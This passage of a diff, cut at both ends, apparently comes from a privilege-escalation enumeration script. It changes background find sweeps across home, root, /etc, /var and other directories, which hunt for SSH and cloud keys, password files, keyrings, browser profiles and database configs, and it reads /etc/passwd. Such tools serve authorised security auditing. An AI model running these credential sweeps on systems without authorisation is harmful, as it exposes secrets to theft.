"$CHROME_RELEVANT_NAMES") + FIND_AUTOLOGIN_RELEVANT_NAMES=$(prep_to_find "$AUTOLOGIN_RELEVANT_NAMES") + FIND_FASTCGI_RELEVANT_NAMES=$(prep_to_find "$FASTCGI_RELEVANT_NAMES") + FIND_SNMP_RELEVANT_NAMES=$(prep_to_find "$SNMP_RELEVANT_NAMES") FIND_DB_RELEVANT_NAMES=$(prep_to_find "$DB_RELEVANT_NAMES") FIND_INSTERESTING_RELEVANT_NAMES=$(prep_to_find "$INSTERESTING_RELEVANT_NAMES") FIND_PASSWORD_RELEVANT_NAMES=$(prep_to_find "$PASSWORD_RELEVANT_NAMES") + FIND_BACKUPS_DIRS_RELEVANT_NAMES=$(prep_to_find "$BACKUPS_DIRS_RELEVANT_NAMES") + #Get home + HOMESEARCH="/home/ /Users/ /root/ `cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " "`" + if [ ! "`echo \"$HOMESEARCH\" | grep \"$HOME\"`" ] && [ ! "`echo \"$HOMESEARCH\" | grep -E \"^/root|^/home|^/Users\"`" ]; then #If not listed and not in /home, /Users/ or /root, add current home folder + HOMESEARCH="$HOME $HOMESEARCH" + fi # Directories - FIND_DIR_VAR=$(eval find /var -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_VAR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_ETC=$(eval find /etc -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_DBUS_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_ETC" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_HOME=$(eval find /home -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_HOME" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_ROOT=$(eval find /root -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_ROOT" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_TMP=$(eval find /tmp -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_TMP" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_USR=$(eval find /usr -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_USR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_OPT=$(eval find /opt -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_OPT" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi + CONT_THREADS=0 + FIND_DIR_VAR=`eval_bckgrd "find /var -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_DBUS_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_HOME=`eval_bckgrd "find $HOMESEARCH -type d $FIND_CHROME_RELEVANT_NAMES -o $FIND_FIREFOX_RELEVANT_NAMES -o $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_CHROME_RELEVANT_NAMES -o $FIND_FIREFOX_RELEVANT_NAMES -o $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` #MacOS Directories - FIND_DIR_USERS=$(eval find /Users -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_USERS" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_PRIVATE=$(eval find /private -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_PRIVATE" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_DIR_APPLICATIONS=$(eval find /Applications -type d $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_DIR_APPLICATIONS" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /Applications -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` # All - FIND_HOME=$(eval find /home/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_HOME" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_ETC=$(eval find /etc/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_ETC" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_ROOT=$(eval find /root/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_ROOT" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_VAR=$(eval find /var/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_VAR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_TMP=$(eval find /tmp/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_TMP" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_OPT=$(eval find /opt/ $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_OPT" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_USR=$(eval find /usr/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_USR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_MNT=$(eval find /mnt/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_MNT" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_LIB=$(eval find /lib/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_LIB" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_RUN=$(eval find /run/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_RUN" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_SYSTEMD=$(eval find /systemd/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_SYSTEMD" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_SYSTEM=$(eval find /system/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_SYSTEM" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_SYS=$(eval find /sys/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_SYS" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_SNAP=$(eval find /snap/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_VAR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi + FIND_HOME=`eval_bckgrd "find $HOMESEARCH $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o 